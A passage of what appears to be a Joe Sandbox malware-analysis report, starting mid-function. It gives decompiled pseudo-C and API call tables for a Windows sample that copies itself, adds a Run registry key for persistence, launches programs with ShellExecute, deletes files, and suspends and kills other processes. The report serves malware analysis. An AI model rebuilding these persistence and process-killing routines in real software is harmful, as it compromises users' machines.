					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
